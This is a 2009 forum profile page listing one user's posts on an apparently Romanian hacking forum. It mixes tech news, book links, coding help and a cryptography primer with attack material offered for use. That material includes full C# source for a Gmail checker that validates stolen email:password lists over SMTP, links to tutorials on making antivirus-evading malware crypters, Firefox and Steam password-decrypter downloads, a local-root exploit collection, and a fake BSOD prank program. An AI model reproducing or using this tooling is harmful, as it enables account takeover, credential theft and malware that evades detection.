Jump to content

Nytro

Administrators
  • Posts

    18733
  • Joined

  • Last visited

  • Days Won

    710

Everything posted by Nytro

  1. Computerele retelei de hoteluri Radisson au fost sparte de Mina Hutterer | 21 august 2009 Hackerii au obtinut informatii despre cartile de credit ale clientilor mai multor hoteluri Radisson din SUA si Canada. Atacurile au avut loc intre lunile noiembrie 2008 si mai anul acesta, dar abia acum Radisson a decis sa le comunice clientilor ca datele despre card-urile lor este posibil sa fi fost furate. Radisson a mai declarat ca lucreaza impreuna cu fortele federale pentru a descoperi faptasii. Iata declaratia integrala Radisson: "Radisson priveste cu seriozitate siguranta dumneavoastra si respecta caracterul privat al informatiilor dumneavoastra, motiv pentru care dorim sa va informam ca intre noiembrie 2008 si mai 2009, computerele unora dintre hotelurile Radisson din SUA si Canada au fost accesate fara autorizatie. Accesul neautorizat contravine legilor civile si penale. Radisson si-a coordonat eforuturile cu fortele federale pentru a contribui la investigarea acestui incident. Desi numarul de hoteluri care este posibil sa fi fost afectate este limitat, datele accesate pot include informatii personale ale clientilor, cum sunt numele imprimat pe cartea de credit sau debit a clientului, numarul cartii de credit sau debit si/sau data expirarii cardului." Radisson si-a indemnat toti clientii sa verifice starea conturilor pentru a vedea daca lipseste ceva.
  2. Primul centru de reabilitare a dependentilor de internet de Vlad Matei | 21 august 2009 Prima institutie de reabilitare a dependentilor de internet se va deschide in curand intr-un parc de cinci hectare, la doar cativa km de campusul Microsoft, iar tratamentul in acest centru va costa 14.500 de dolari, informeaza presa de specialitate. Responsabilul institutiei de reabilitare a dependentei legate de mediul online spun ca misiunea centrului este aceea de a-i reconecta la realitate pe tinerii care petrec multe ore pe zi in fata calculatorului. Tratamentul se desfasoara timp de sase saptamani, iar care pacientii sunt tinuti departe de jocurile video si sunt supusi unor programe de relaxare prin sport in aer liber. Tot aici se incearca obisnuirea pacientilor cu un stil de viata sanatos. De asemenea, dependentii de internet mai beneficiaza de consiliere profesionala si psihologica. Taxa de 14.500 de dolari pentru tratamentul oferit de clinica nu este suportata de asigurarea de sanatate. In momentul de fata nu se cunosc tratamente specifice pentru dependenta de internet, pentru ca si cunostintele medicale in domeniu sunt extrem de limitate. Saptamana aceasta, cel mai recent studiu dedicat adultilor dependenti de internet a incercat sa aduca noi lamuriri cu privire la afectiunile dependentilor de internet. Cele mai multe persoane care sufera de dependenta de mediul virtual par a fi supraponderalii si deprimatii. Autorii studiului au recunoscut ca sunt incapabili sa dovedeasca un veritabil raport de cauzalitate intre jocurile video si comportamentul de care dau dovada majoritatea dependentilor de internet. In Olanda si Belgia, dependenta de internet este tratata din 2006 in institutii specializate, iar in Franta exista un centru de reabilitare a dependentilor de jocuri video si internet, infiintat la sfarsitul anului trecut in orasul Nantes, din vestul Frantei. Acest gen de dependenta "este o problema de sanatate publica prea putin luata in considerare in prezent" explica reprezentantul centrului de la Nantes Cristelle Andress la inaugurarea institutiei. Centrele de reabilitare a dependentilor de internet din China au fost luate in vizor de autoritati si de presa din intreaga lume dupa ce au avut loc mai multe abuzuri asupra unor tineri, care s-au soldat cu decesul unui adolescent si spitalizarea unui copil de 14 ani. Adolescentul a fost adus in stare grava la spital dupa ce a fost batut intr-o tabara de reabilitare a dependentilor de internet din sud-est-ul Chinei, in incercarea de a-l dezvata de obiceiul navigarii online, informa, miercuri, AFP, citand China Daily. Incidentul a avut loc la doar cateva saptamani dupa ce un alt adolescent a fost ucis in bataie intr-o tabara de acelasi gen din sudul tarii. Potrivit unui studiu realizat anul trecut de Asociatia de internet a tinerilor chinezi, peste 10 din 100 de milioane de adolescenti chinezi sunt dependenti de internet, iar in toata tara sunt aproximativ 400 de centre de reabilitare pentru acest gen de "afectiune". Luna trecuta, ministrul Sanatatii din China a interzis folosirea electrosocurilor in tratamentul dependentei de internet. Expertii medicali chinezi au pledat pentru adoptarea unor legi si reglementari specifice, care sa supervizeze activitatea taberelor unde parinti isi trimit copiii pentru a-i tine departe de computere si de internet. Sursa: Newsin
  3. Pirate Bay se poate... pirata de Mina Hutterer | 18 august 2009 21,3 GB - atat are faimosul sit de torrents, aflat acum pe punctul sa-si schimbe proprietarii, motiv pentru care fanii au devenit extrem de ingrijorati ca vor ramane fara sursa lor de torente cea de toate zilele. Desi nu foarte lume are capacitatea hardware de a rula un sit atat de mare, totusi doritorii pot sa faca un "back up" cu cei 21,3 GB de date, inclusiv o arhiva a tuturor celor 873.671 de fisiere torrent pastrate pe serverele Pirate Bay. Utilizatorul care a compilat index-ul si apoi l-a upload-at spune ca a facut acest lucru pentru ca este ingrijorat ca torentele vor disparea dupa ce Pirate Bay intra pe mainile noilor proprietari.
  4. There isn't any source code, there is the executable decompiled...
  5. Author: steve10120 Description: Flash tutorial showing how to make a scantime undetectable crypter in visual basic Download: http://hackhound.org/forum/link.php?link=http://hhdownloads.com/tutorials/ScanTime_Crypter_Tutorial.rar
  6. by skyweb07: Well guys it seems there are many people who would like to learn how to create your own Crypter, because today I bring you the solution, it is a Videotutorial who just finished explaining in detail how to create a Visual Basic Runtime Crypter. As many will know my English is rather poor in regard to the words so I tried to explain as much as possible and discuss all the lines of the video ... In the coming RAR + Video Project already done everything, but I advise you to look at the video and to understand better what they do if they see it ... Well I hope you like it a lot and leave comments ... Greetings to all and sorry if the video committed a misspelling: p .. My English is shit: P Download: http://hackhound.org/forum/link.php?link=http://www.exponelo.com/files/0LERU6QM/RunTime.rar Nu l-am vazut, m-am uitat prin el, si am vazut multe comentarii, cred ca e bine explicat.
  7. Download: https://h30406.www3.hp.com/campaigns/2008/wwcampaign/1-57C4K/images/Scrawlr.msi
  8. Paperback: 384 pages Publisher: Wiley (March 3, 2009) Language: English ISBN-10: 0470395362 ISBN-13: 978-0470395363 Format: PDF Description: As more and more vulnerabilities are found in the Mac OS X (Leopard) operating system, security researchers are realizing the importance of developing proof-of-concept exploits for those vulnerabilities. This unique tome is the first book to uncover the flaws in the Mac OS X operating system—and how to deal with them. Written by two white hat hackers, this book is aimed at making vital information known so that you can find ways to secure your Mac OS X systems, and examines the sorts of attacks that are prevented by Leopard’s security defenses, what attacks aren’t, and how to best handle those weaknesses. Download: http://www.file2box.com/lhyw91twhf0l
  9. Paperback: 288 pages Publisher: Wiley (March 23, 2009) Language: English ISBN-10: 0470478365 ISBN-13: 978-0470478363 Format: PDF Description: Explore a ton of powerful Mac OS X UNIX commands This handy, compact guide teaches you to use Mac OS X UNIX systems as the experts do: from the command line. Try out more than 1,000 commands to find and get software, monitor system health and security, and access network resources. Apply the skills you learn from this book to troubleshoot networks, lock down security, and uncover almost anything you care to know about your Mac OS X system. Expand your Mac OS X UNIX expertise in these and other areas: - Using the shell - Finding online software - Working with files - Playing with music and images - Administering file systems - Backing up data - Checking and managing running processes - Accessing network resources - Handling remote system administration - Locking down security Download: http://www.file2box.com/a9vllqzqbigt
  10. using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Net.Mail; using System.Net; using System.Collections; using System.IO; namespace GMailCheck { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button1_Click(object sender, EventArgs e) { try { if(textBox1.Text == "") MessageBox.Show("list is empty"); ArrayList mails = new ArrayList(textBox1.Text.Split('\n')); //seperate them by new lines for (int i = 0; i < mails.Count; i++) { ArrayList mailInfo = new ArrayList(mails[i].ToString().Split(':')); if (!mailInfo[0].ToString().EndsWith("@gmail.com")) mailInfo[0] = mailInfo[0] + "@gmail.com"; if (checkAccount(mailInfo[0].ToString(), mailInfo[1].ToString())) { textBox2.Text += mailInfo[0].ToString() + ":" + mailInfo[1].ToString() + "\r\n"; } } } catch (Exception ex) { MessageBox.Show(ex.Message); } } static bool checkAccount(string username, string password) { //we use fake emails so nobody recieves the email, if you want a email when //the correct login is found, supply your email address MailMessage msg = new MailMessage(); msg.From = new MailAddress("Wefwqefwef@sdfsddf.com");//fake email msg.To.Add("Asfasdf@ssdfs.com");//fake email msg.Subject = "test"; msg.Body = "test"; SmtpClient smtp = new SmtpClient("smtp.gmail.com"); smtp.Credentials = new NetworkCredential(username, password); smtp.EnableSsl = true; try { smtp.Send(msg); return true; } catch(Exception ex) { return false; } } private void button2_Click(object sender, EventArgs e) { try { openFileDialog1.ShowDialog(); StreamReader read = new StreamReader(openFileDialog1.FileName); while (!read.EndOfStream) { textBox1.Text += read.ReadLine() + "\r\n"; } } catch (Exception ex) { MessageBox.Show(ex.Message); } } } } Credits: sunjester
  11. Cititi si voi asta oameni buni:
  12. "designeri php" - Interesant... Trebuia sa postezi la Gunoi. Dar am mutat eu
  13. Poti, dar vezi sa nu ii strici structura, adica sa nu incepi sa stergi caractere de acolo.
  14. Nytro

    Iframe VB6

    CTRL + T, bifezi Microsoft Internet Controls, Apply, Ok. Iti apare un glob in Toolbox, il dersenezi pe Form, si ca sa intri pe site: WebBrowser1.Navigate "http://www.google.ro/"
  15. Eroarea e de la CSocketMaster, o clasa pentru inlocuirea mswinsck-ului. PS: Cred ca ma reapuc de Digital Keylogger v4.0.
  16. Tier One: Introduction to Visual C++ 2008 Express Edition This introductory video covers the main features of the Visual C++ 2008 Express Edition and walks you through some of the most common tasks you’ll be doing as you create your programs. By the end of this video, you’ll be more familiar with the development environment and able to get started creating your first application. Some of the topics covered in this video are: Setup Creating a Project Project Files and the Development Environment Writing C++ code Debugging Compiling Managing files and Setting Options Where to go from here Duration: 34 minutes, 46 seconds Video: http://msdn.microsoft.com/en-us/beginner/bb964629.aspx
  17. Tier One: Introduction to Visual Basic 2008 Express Edition This introductory video covers the main features of the Visual Basic 2008 Express Edition, and walks you through some of the most common tasks you’ll be doing as you create your programs. By the end of this video, you’ll be more familiar with the development environment and able to get started creating your first application. Some of the topics covered in this video are: Setup Creating a Project The Windows Form Designer Writing Visual Basic code Compiling, Running and Saving your project Errors and Debugging Project Files, Properties and Customization Data Where to go from here Duration: 36 minutes, 26 seconds Video: http://msdn.microsoft.com/ro-ro/beginner/bb964633(en-us).aspx
  18. Nu folosesc nici unul. Daca chiar am nevoie de unul imi fac singur ( modific Royalu ). Dar nu ma ocup cu astfel de prostii.
  19. Hi, this is a guide about the basics of encryption and all that stuff. I am not an expert in this, I don't know much and as I said, this is only a basic introduction to cryptology in general. First, we need to define what's cryptology and what cryptography. Cryptology is the study of cryptography. Cryptography is the process/skill of encrypting /decrypting ciphers. They are not the same thing. Easy enough. But it's way more complicated than it sounds. There are over 10k encryption methods, each of them different and unique. Some are obsolete, some are damn hard to crack, some are irreversable. As time passes and the decrypters' brain evolves, day by day encryptions are becoming obsolete. But then again, at the same time, the encrypters' brain evolves as well. Stupid example, I know. I'm sure you've heard of md5 (Message Digest algorithm 5, will explain about it later), some consider it uncrackable, irreversable etc. An algorithm created for encrypting sensitive data, such as passwords in a database. Slowly, more and more weaknesses are found in md5 and it's becoming obsolete, so experts started recommending SHA1. (it's slower, and personally I wouldn't recommend it. But, I'm not an expert, what can I say) Enough about md5, let's get back to cryptography in general. Cipher(Cypher) is an algorithm for performing encryption. Encryption has had a major role in history. Key components of an encryption are plaintext (your word, call it whatever you like) and a key (password) that are put through a reversable process named algorithm. The result is ciphertext, which is usually a string which makes no sense whatsoever. There are two methods of cryptography, transposition and substitution. Transposition is where numbers, letters and characters are the same but with different positions. Substitution is where they're replaced with new ones. There are two main types of cryptography, asymmetric and symmetric (also known as public and private keys). I'll explain about those later. All encryption is about, is security. To know if your encryption system is secure, you need to know the vulnerabilities and holes of the previous encryption systems. Encryption systems can be insecure in several ways. One of them being your algorithm being too simple, or the most common weakness in cryptosystems, limited number of possible keys. An attacker can crack it by trying every possible combination there is. Such an attack is known as brute-force. -=[Attack types]=- 1. Bruteforcing: Probably the simpliest way, where the attacker guesses every possible combination till he gets a plaintext result, assuming that the attacker has the key and sufficient resources. 2. Rainbow Table: I don't know much about this. It's the fastest method to use, but it takes some time to create the table and sort it. Rainbow table attack is something like bruteforcing, but in this case, we trade memory for speed. Would compare it with process forking (uhm, don't judge me). 3. Dictionary Attack: All you need is a wordlist with common passwords. This is why I do not recommend using common words as passwords, it's easy to crack. Basically, every word on the wordlist is encrypted till you get a matching hash. -=[The difference between encrypting, encoding and hashes]=- 1. Encryption: The most common of all. Simple, a plaintext and a key are put through an algorithm to produce a ciphertext. Encryptions are reversable, everyone with the ciphertext, key and algorithm can produce the plaintext. Encrypting a plaintext with a different key will result in a different ciphertext, as well as encrypting different messages will result in different ciphertext. 2. Encoding: Almost the same as encryption, except that the key is missing. A plaintext is put through an algorithm, and you get a ciphertext. It's the least used of all three. The key is the MOST important thing. This is not used for security. An example would be mp3 encoding. Your mp3 player decodes the bits and produces the appropriate sound. 3. Hashes: The most complicated of all. Due to the fact that hashes are of a finite size and there is an infinite number of strings you could input into the algorithm there are an infinite number of strings that could produce the same hash. There is not only one possible result and different plaintexts can and will produce the same result, these are called 'collisions'. Hashes are irreversable, with or without the algorithm, there is no way to reverse it. For example, passwords in vBulletin are encrypted in md5. How does the forum know that it's the true password then? It doesn't. As soon as you enter it, it's encrypted in md5, and the forum reads the md5, not the plaintext. As I said, every plaintext will result in it's own hash. When you enter the password, it compares the md5 hash to the one stored in the database. It doesn't have to be the same password as you're using, as long as the ciphertext matches (read above, collision). -=[Examples]=- All ciphertexts are encryptions, encodings or hashes of the word uNkn0wn. 1. MD5: There's a whole paragraph on MD5 later in this article. 5b65e9d92c14d3ca940c7c57db1c19d0 - uNkn0wn dd0896ca696f7d2d50b94aeb1c896a1f - unkn0wn.(case sensitive) 2. Base64: I don't know how to explain it. Base64 is just an encoding algorithm, not an encryption algorithm, it's main use is to send binaries via email and usenet, it turns crazy ASCII codes that you have in binaries into normal text, so it's in a form that can be transmitted via email. Don't expect it to provide any form of security. dU5rbjB3bg== - uNkn0wn. 3. Binary: Made of 1s and 0s in groups of eight. 01110101 01001110 01101011 01101110 00110000 01110111 01101110 - uNkn0wn. 4. Hex: Letters A-Z and numbers 0-9 together. This is not an encryption. Not going to talk about it. 75 4e 6b 6e 30 77 6e 65 64 - uNkn0wn (this is the web way of hex, the "correct" would be 0x75 0x4e 0x6e etc) 5. ROT13: Rotates 13 letters backwards. haxa0ja - uNkn0wn. 6. DES: Data Encryption Standard. Kinda insecure now a days. 56-bit values based on Data Encryption Algorithm. CRJ4GGqMoYx1w - uNkn0wn. 7. SHA1: Sort of like MD5, just with a 160-bit value. 45E252668E0B735E697B1DC21139EE6A3C9CB391 - uNkn0wn. FD11CE37EDC92D41D990AE666EAC00F1EAE8AD7C - unkn0wn. (case sensitive) 8. WHIRLPOOL: Cryptographic hash function that given a message less than 2256 bits in length, it returns a 512-bit message digest represented as 128-digit hexadecimal numbers. Like SHA and MD5, a single character change in the plaintext will result in a completely different cipher. 202DD91B4F1FE7F42388371F91CEE6180B3A1111ACD1167B296CADF3F016D759 8BD93A6211666EDD577F9CF9F25D473215A7E6D69CA7D53EC1ADCB1BF65E3800 - uNkn0wn (it's long) That would be enough encryptions/encodings/hashes for now. -=[MD5 - Message Digest Algorithm 5]=- The famous MD5, widely used. Most people consider it irreversable, but no encryption method is irreversable. Well, sorta. Once you encrypt something in md5 you can't get it back the same way you encrypted it. Attack types explained above. MD5 hashes are used for encrypting sensitive data, as well as a digital signature. If anything is changed, including case, the whole hash twists. The only known way to crack an MD5, is collision (read bruteforcing and dictionary attacks) where a number of possible passwords are encrypted and compared with the MD5 hash being cracked. A MD5 hash will always be 32 characters in length (128-bit value) and only consists of the characters (charset) a-f and 0-9 (hex). When bruteforcing an MD5 hash, we need to define a charset and possible length which we believe the plaintext would be. But keep in mind that using a wordlist is much faster than bruteforcing since there is a set number of hashes possible. The larger the wordlist is, the higher the chance of cracking the hash is, but it will also take longer. For a more successful attack, you can try capitalizing the words, reversing order, adding chars etc etc. MD5 is becoming easier and easier to crack, which means that a new, more secure method of encryption would be needed. A salt is made up of random bits that are used as inputs to a KDF. Think of it like this, if a user's key is stolen and he is known to have a pass of an english word. Because of the salt, pre-calculated hashes have no value. So this increases the amount of hashes that have to be computed from 200,000 to 800 trillion. Salt should always be applied, no matter the security of the algorithm. Any md5 hash is vulnerable to BF/Rainbow tables unless the hash incorporates a salt, (MySQL MD5 encryption does not use salts which really makes it easy to crack) If someone was to gain access to the database .. Average timetables for BF attacks on MD5 would be something like this Note: the 1,8 means testing all possible passwords 1-8 chars in length.. (if the forum requires say 4 letters min then they would do 4-8 cutting the time in basically half) 8 Chars [a-zA-Z0-9]{1,8} ... about 497 days [a-z0-9]{1,8} ...... about 6 days [a-zA-Z]{1,8} ...... about 6 days [A-Z0-9]{1,8} ...... about 6 days -=[symetric/Asymmetric Keys]=- One of the main components of an encryption is the key. In all cases, we must assume that the attacker has the cryptographic algorithm and the ciphertext. It's just a matter of time before he cracks it. In order to prevent him from getting the plaintext, we use keys. How does this work, well...keys are simply just small pieces of data, metadata even, that will keep the information safe. In other words, this is just a password. Anyone with the key and the algorithm can get the plaintext. There's public and private keys, symetric and asymmetric. I'll explain the difference in short, when our algorithm uses one key for both encryption and decryption, then we got a symetric key. When we have an encryption which uses a different key for encrypting and a different key for decrypting, this is asymmetric. Let's see how it would look in the "real" world. User A encrypts a message using a public key. Message is sent to user B in an encrypted form. User B has the private key, only he can decrypt it. Everyone can encrypt using the public key, only you can decrypt it using the private key. In some cases, you will need to fetch the private key from your targets. This is the part where social engineering comes in handy. Another example would be a mailbox. Everyone can leave a letter, only you can unlock the mailbox and read it. There's plenty of keys used around, one of the most used being RSA which includes both public and private key. Keys should be random nonsense for security. Usually KDF (key derivation function) is used in this case which adds a salt and compresses the key to a fixed length. This is used for digital signatures as well. Conclusion tip: Never use a password which can be found in the dictionary. Thank you. I hope you enjoyed this article, even though I doubt it. It's for educational purposes. Please let me know if you see any grammatical errors. Or, let me know if I missed punctuation somewhere. ~FxM
  20. Codul sursa a fost generat automat de Photoshop ( banuiesc ).
  21. Author: Uranium-239 #include <windows.h> #define SCREEN(x) GetSystemMetrics(*x == 'X' ? SM_CXSCREEN : SM_CYSCREEN) LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM); char szClassName[ ] = "WindowsApp"; const char * BSOD_TEXT[] = { "-A problem has been detected and Windows has been shut down to prevent damage", "-to your computer.", "*The problem seems to have been caused by the following file: SPCMDCON.SYS", "*PAGE_FAULT_IN_NONPAGED_AREA", "*If this is the first time you've seen this Stop error screen,", "-restart your computer. If this screen appears again, follow", "-these steps:", "*Check to make sure any new hardware or software is properly installed.", "*If this is a new installation, ask your hardware or software manufacturer", "-for any Windows updates you may need", "*If problems continue, disable or remove any newly installed hardware", "-or software. Disable BIOS memory options such as caching or shadowing.", "*If you need to use Safe Mode to remove or disable components, restart", "-your computer, press F8 to select Advanced Startup Options, and then", "-select Safe Mode.", "*Technical Information:", "**** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)", "**** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c" }; void PRINT_TEXT(HDC hDC){ unsigned char k = 0; unsigned short y_co = 30; while(k <= 17){ if(BSOD_TEXT[k][0] == '*') y_co += 23; TextOut(hDC,10,y_co+(k*23),BSOD_TEXT[k]+1,lstrlen(BSOD_TEXT[k])-1); k++; } } int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil){ HWND hwnd; MSG messages; WNDCLASSEX wincl; wincl.hInstance = hThisInstance; wincl.lpszClassName = szClassName; wincl.lpfnWndProc = WindowProcedure; wincl.style = CS_DBLCLKS; wincl.cbSize = sizeof (WNDCLASSEX); wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION); wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION); wincl.hCursor = LoadCursor (NULL, IDC_ARROW); wincl.lpszMenuName = NULL; wincl.cbClsExtra = 0; wincl.cbWndExtra = 0; wincl.hbrBackground = CreateSolidBrush(RGB(0,0,0x77)); if (!RegisterClassEx (&wincl)) return 0; ShowCursor(FALSE); hwnd = CreateWindowEx ( 0, szClassName, "BSOD", WS_POPUP, 0, 0, SCREEN("X"), SCREEN("Y"), HWND_DESKTOP, NULL, hThisInstance, NULL ); ShowWindow (hwnd, nFunsterStil); while(GetMessage (&messages, NULL, 0, 0)){ TranslateMessage(&messages); DispatchMessage(&messages); } return messages.wParam; } HDC hDC; PAINTSTRUCT ps; HFONT hFont; LRESULT CALLBACK WindowProcedure(HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam){ switch(message){ case WM_DESTROY: PostQuitMessage(0); break; case WM_PAINT: hDC = BeginPaint(hwnd,&ps); hFont = CreateFont( 26, 16, 0, 0,FW_NORMAL, FALSE, FALSE, FALSE, ANSI_CHARSET,OUT_DEFAULT_PRECIS,CLIP_DEFAULT_PRECIS, DEFAULT_QUALITY,DEFAULT_PITCH|FF_ROMAN,"Courier New" ); SelectObject(hDC, hFont); SetTextColor(hDC,RGB(0xFF,0xFF,0xFF)); SetBkColor(hDC,RGB(0,0,0x77)); PRINT_TEXT(hDC); DeleteObject(hFont); EndPaint(hwnd, &ps); break; default: return DefWindowProc (hwnd, message, wParam, lParam); } return 0; } Screenshot: http://i30.tinypic.com/6qdsmw.jpg
  22. Mozilla Firefox 3.5 Password Decrypter Credits: bl4cksun.org Download: http://www.2shared.com/file/7142545/68574f27/firefox35decrypter.html
  23. Steam® application password decrypter. Credits: bl4cksun.org Download: http://www.2shared.com/file/7142526/a704b91b/steam_password_reader.html
  24. Mai gasiti aici: http://th3-0utl4ws.com/localroot/
  25. Buffer Overflow Basics Video Series! In this video series we will learn the basics of Buffer Overflow attacks and demonstrate how one can exploit Buffer Overflows in programs for fun and profit. The pre-requisite for this video series is that you are familiar with Assembly language. If you are not familiar with Assembly language, no worries, I have created detailed video tutorials for Assembly language here - Assembly Language Primer for Hackers. 1. Smashing the Stack In Part 1 of the Buffer Overflow series we will look at why buffer overflow attacks happen. We will discuss how the program stack is laid out when a function call happens, then how a buffer can be overwritten if proper bounds checking does not happen and finally how a hacker could take control of the program by overwriting the return address stored on the stack to an arbitrary value. Buffer Overflow Primer Part 1 (Smashing the Stack) Tutorial 2. Writing Exit Shellcode In this video we will look at how to create Shellcode which we can use as payload while exploiting a buffer overflow vulnerability. Buffer Overflow Primer Part 2 (Writing Exit Shellcode) Tutorial 3. Executing Shellcode In the last video we saw how to create shellcode from assembly language code, this video will concentrate on how to execute the shellcode from within a C program to check that it is working properly. Buffer Overflow Primer Part 3 (Executing Shellcode) Tutorial 4. Disassembling Execve In this video we will look at how to create shellcode for the Execve() syscall. We will first create a C program to spawn a shell using Execve(), then we will disassemble the program to understand how the syscall works and the kind of inputs it expects. Buffer Overflow Primer Part 4 (Disassembling Execve) Tutorial 5. Shellcode for Execve In this video we will learn how to convert the shellcode created in the previous video to a more usable format. It is important to note that the shellcode in the previous video cannot be used as-is becuase it contains NULLs and hardcoded addresses. Thus we need to convert it into something which can be injected into a buffer - i.e. we need to remove the NULLs and setup relative addressing. This video will show how we can replace the NULLs in the shellcode with instructions which results in non-NULL shellcode. Also, we discuss in detail how we can setup relative addressing within the shellcode and modify it at runtime to make it work. Buffer Overflow Primer Part 5 (Shellcode for Execve) Tutorial 6. Exploiting a Program In this video we will understand how to use the shellcode created in the previous video to exploit an actual program. Buffer Overflow Primer Part 6 (Exploiting a Program) Tutorial 7. Exploiting a Program Demo In this video we will do a buffer overflow exploitation demo using HackYou.c and ExploitMe.c Buffer Overflow Primer Part 7 (Exploiting a Program Demo) Tutorial 8. Return to Libc Theory In this video we will look at how to subvert the NX protection mechanism. The NX protection mechanism basically marks the stack, heap etc. as Non-Executable. This means the processor will not execute any instruction which is on them. From a stack overflow standpoint, this is a problem as our entire shellcode is on the stack, which now has been marked "Non-Executable". The way we counter this problem, is by using a technique called "Return to Libc". Buffer Overflow Primer Part 8 (Return to Libc Theory) Tutorial 9. Return to Libc Demo In this video we will do a hands on demo of exploiting a stack protected by NX using the Return to Libc exploitation process. We use GDB and attach it to the vulnerable program to find the address of "/bin/bash" in it's memory. Once this address is found, we modify Ret2libc.c and launch the attack on the vulnerable program. The successful exploitation leads to spawning of a shell. Buffer Overflow Primer Part 9 (Return to Libc Demo) Tutorial Thanks, Vivek
×
×
  • Create New...